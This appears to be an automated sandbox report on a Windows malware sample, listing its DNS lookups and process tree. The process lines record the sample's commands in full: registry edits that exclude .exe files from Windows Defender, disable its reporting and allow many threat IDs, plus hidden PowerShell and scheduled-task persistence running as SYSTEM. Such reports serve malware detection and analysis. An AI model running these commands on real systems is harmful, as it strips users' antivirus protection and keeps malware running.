                                        Nov 24, 2022 19:16:16.000452042 CET | 53 | 56924 | 8.8.8.8 | 192.168.2.3

                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                        Nov 24, 2022 19:16:15.101864100 CET | 192.168.2.3 | 8.8.8.8 | 0xc24c | Standard query (0) | service-domain.xyz | A (IP address) | IN (0x0001) | false
                                        Nov 24, 2022 19:16:15.974688053 CET | 192.168.2.3 | 8.8.8.8 | 0x51c1 | Standard query (0) | clients2.google.com | A (IP address) | IN (0x0001) | false

                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                        Nov 24, 2022 19:16:15.119308949 CET | 8.8.8.8 | 192.168.2.3 | 0xc24c | No error (0) | service-domain.xyz | | 3.80.150.121 | A (IP address) | IN (0x0001) | false
                                        Nov 24, 2022 19:16:16.000452042 CET | 8.8.8.8 | 192.168.2.3 | 0x51c1 | No error (0) | clients2.google.com | clients.l.google.com | | CNAME (Canonical name) | IN (0x0001) | false
                                        Nov 24, 2022 19:16:16.000452042 CET | 8.8.8.8 | 192.168.2.3 | 0x51c1 | No error (0) | clients.l.google.com | | 142.250.203.110 | A (IP address) | IN (0x0001) | false

                                        Target ID:0
                                        Start time:19:15:05
                                        Start date:24/11/2022
                                        Path:C:\Users\user\Desktop\file.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\file.exe
                                        Imagebase:0x400000
                                        File size:7604002 bytes
                                        MD5 hash:E99E15A440798E20C682EB859B3F7885
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        Target ID:1
                                        Start time:19:15:06
                                        Start date:24/11/2022
                                        Path:C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe
                                        Wow64 process (32bit):true
                                        Commandline:.\Install.exe
                                        Imagebase:0x400000
                                        File size:6571809 bytes
                                        MD5 hash:65D01849A2062434BCE6C580CDA92A1D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 41%, ReversingLabs
                                        Reputation:low

                                        Target ID:2
                                        Start time:19:15:08
                                        Start date:24/11/2022
                                        Path:C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe
                                        Wow64 process (32bit):true
                                        Commandline:.\Install.exe /S /site_id "525403"
                                        Imagebase:0x3f0000
                                        File size:7104512 bytes
                                        MD5 hash:893793FBD70BA4A92919D09205D6C9C1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 51%, ReversingLabs
                                        Reputation:low

                                        Target ID:3
                                        Start time:19:15:10
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\forfiles.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
                                        Imagebase:0x10f0000
                                        File size:41472 bytes
                                        MD5 hash:4329CB18F8F74CC8DDE2C858BB80E5D8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:4
                                        Start time:19:15:10
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:5
                                        Start time:19:15:10
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\forfiles.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
                                        Imagebase:0x10f0000
                                        File size:41472 bytes
                                        MD5 hash:4329CB18F8F74CC8DDE2C858BB80E5D8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:6
                                        Start time:19:15:10
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:7
                                        Start time:19:15:11
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                        Imagebase:0xb0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:8
                                        Start time:19:15:11
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                        Imagebase:0xb0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:9
                                        Start time:19:15:11
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:10
                                        Start time:19:15:11
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:11
                                        Start time:19:15:11
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:12
                                        Start time:19:15:11
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:13
                                        Start time:19:15:13
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                        Imagebase:0xde0000
                                        File size:185856 bytes
                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:14
                                        Start time:19:15:14
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:15
                                        Start time:19:15:14
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:schtasks /run /I /tn "gbyyEslRl"
                                        Imagebase:0xde0000
                                        File size:185856 bytes
                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:16
                                        Start time:19:15:14
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:17
                                        Start time:19:15:14
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                        Imagebase:0x7ff74b5f0000
                                        File size:447488 bytes
                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET

                                        Target ID:18
                                        Start time:19:15:14
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language

                                        Target ID:28
                                        Start time:19:15:30
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\gpupdate.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\gpupdate.exe" /force
                                        Imagebase:0x7ff6e5af0000
                                        File size:29184 bytes
                                        MD5 hash:47C68FE26B0188CDD80F744F7405FF26
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language

                                        Target ID:29
                                        Start time:19:15:30
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language

                                        Target ID:32
                                        Start time:19:15:31
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\gpscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:gpscript.exe /RefreshSystemParam
                                        Imagebase:0x7ff636b30000
                                        File size:44544 bytes
                                        MD5 hash:C48CBDC676E442BAF58920C5B7E556DE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:33
                                        Start time:19:15:31
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:schtasks /DELETE /F /TN "gbyyEslRl"
                                        Imagebase:0xde0000
                                        File size:185856 bytes
                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:34
                                        Start time:19:15:32
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:35
                                        Start time:19:15:33
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:16:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe\" DC /site_id 525403 /S" /V1 /F
                                        Imagebase:0xde0000
                                        File size:185856 bytes
                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:36
                                        Start time:19:15:33
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:37
                                        Start time:19:15:36
                                        Start date:24/11/2022
                                        Path:C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe DC /site_id 525403 /S
                                        Imagebase:0xa0000
                                        File size:7104512 bytes
                                        MD5 hash:893793FBD70BA4A92919D09205D6C9C1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 51%, ReversingLabs

                                        Target ID:38
                                        Start time:19:15:38
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD 
\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                        Imagebase:0x1b0000
                                        File size:430592 bytes
                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET

                                        Target ID:39
                                        Start time:19:15:38
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:41
                                        Start time:19:16:24
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                        Imagebase:0xb0000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:42
                                        Start time:19:16:24
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:43
                                        Start time:19:16:25
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:44
                                        Start time:19:16:26
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:45
                                        Start time:19:16:26
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:46
                                        Start time:19:16:26
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:47
                                        Start time:19:16:27
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:48
                                        Start time:19:16:27
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:51
                                        Start time:19:16:28
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:52
                                        Start time:19:16:28
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:53
                                        Start time:19:16:29
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:54
                                        Start time:19:16:29
                                        Start date:24/11/2022
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                        Imagebase:0x1c0000
                                        File size:59392 bytes
                                        MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Target ID:208
                                        Start time:19:17:11
                                        Start date:24/11/2022
                                        Path:C:\Windows\System32\Conhost.exe
                                        Wow64 process (32bit):
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:
                                        Has administrator privileges:
                                        Programmed in:C, C++ or other language

                                          Execution Graph

                                          Execution Coverage:15%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:2.3%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:44
